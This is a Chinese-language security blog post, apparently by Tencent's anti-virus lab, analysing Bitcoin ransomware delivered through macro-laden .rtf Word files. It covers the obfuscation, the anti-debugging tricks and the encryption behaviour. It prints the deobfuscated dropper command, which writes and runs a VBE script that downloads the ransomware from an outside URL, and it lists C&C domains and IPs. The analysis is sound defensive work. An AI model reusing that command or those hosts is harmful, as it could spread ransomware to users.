比特币敲诈者现身中文版Word

2016-05-13 382638人围观 ,发现 15 个不明物体 系统安全

QQ截图20160513110320.png

比特币敲诈者以加密用户电脑文件,并勒索用户钱财而臭名昭著。对用户来说,文件被加密的结果可能是通宵达旦写成的文档变成一坨乱七八糟的代码,想要解密恢复文件?就得交钱!

在众多绑票软件中,比特币敲诈者无疑是最猖狂的。其黑产模式之完善,归根于比特币支付无法被追踪这一特性。在一整套攻击设备中,RAS加密算法、洋葱匿名网络、僵尸网络,从攻击到交钱,配套的“服务”应有尽有,目标是使最小白的用户也能把钱交到自己手里,透露出“只谋钱财,不伤人性命”的歹徒之气。

一直以来,腾讯反病毒实验室都在密切关注比特币敲诈者的变化趋势。从电脑管家近期的拦截数据来看,其攻击仍在持续活跃,并且呈现出工作日走高,周末低迷的攻击趋势。

图片1.png

0×00 概述

近日,腾讯反病毒实验室发现一批后缀名为.rtf的比特币敲诈者病毒传播载体,传播热度上万,和之前的载体一样利用Word宏代码下载母体感染电脑,但不同的是这次病毒传播载体是为国内用户“量身定制”的——中文版word也会中招。

图片2.png

图片3.png

从virustotal上看,目前国外大部杀软都可以查杀,但国内的杀软并没有跟上节奏。

图片4.png

图片5.png

0×01 详细分析

1.1 按Alt+F11打开宏代码,国际惯例,代码被上锁了。

图片6.png

破解后,打开看到是一堆“神奇”的代码,看不出有什么作用,显然是代码混淆。

图片7.png

1.2 隐藏在窗体控件里的代码

在一连串无关代码中,发现只有一句实际干活的代码,是通过shell执行命令。Shell后面的字符串看起来像乱码,仔细观察可以发现,这是作者对窗体控件的命名。

图片8.png

窗体控件会做一些隐藏,如Textbox长度拉到最小、用Frame控件覆盖Textbox控件,这些都是为了掩人耳目。还原Textbox内容如下:

图片9.png

最后,去除混淆代码后,拼接出shell要执行的命令,如下,在temp目录创建vbe脚本,然后执行vbe脚本,然后vbe下载比特币敲诈者母体,并执行。

cmd /c echo|set /p="TUYGSDJDSF = "http://sin.grupo-integral.co/lexisnexis/search/bgreport.php"">%TMP%\asdasdv.vbe & start %TMP%\asdasdv.vbe

1.3 比特币敲诈者分析

图片10.png

样本是用VB写的,如下图,通过分析了解到样本做了一些反调试手段——傀儡进程和双进程反调试。

图片11.png

1. 首先,样本把自身复制到temp目录下,命名为svchost.exe,并运行。创建自身傀儡进程后,通过ZwWriteVirtualMemory注入并内存展开EXE,然后调用DebugActiveprocess附加调试傀儡进程,使调试软件无法附加调试,如下图。

图片12.png

2. 敲诈过程

通过合适的时机dump下傀儡进程的exe,通过分析,发现跟往常的比特币敲诈者行为上没有本质变化。

删除全盘所有卷影副本。

图片13.png

根据生身ID,连接C&C服务器,请求加密钥。

图片14.png

加密完成后,根据电脑语言环境下载对应语言的交赎金说明文件。笔者这边电脑是中文环境,所以说明文件也是中文的,如下图。这可以说明比特币敲诈团伙也是有考虑到中国这个“大市场”。

图片15.png

附C&C服务器列表:

chemklqv.work

yqaykaauthygklbo.biz

vxkgvppaemlnpepe.click

sviripfnu.pw

lktgmggbevq.biz

sviripfnu.pw

wvtyuevqjmqboqejb.su

eusvlipfnb.info

91.226.93.113

138.201.95.72

31.184.197.126

bjejoluukormb.click

boutgbv.work

soefruirthjolb.pl

tjelscxnhjpyosoi.su

* 作者:腾讯电脑管家(企业账号),转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

这些评论亮了

发表评论

已有 15 条评论

取消
Loading...
css.php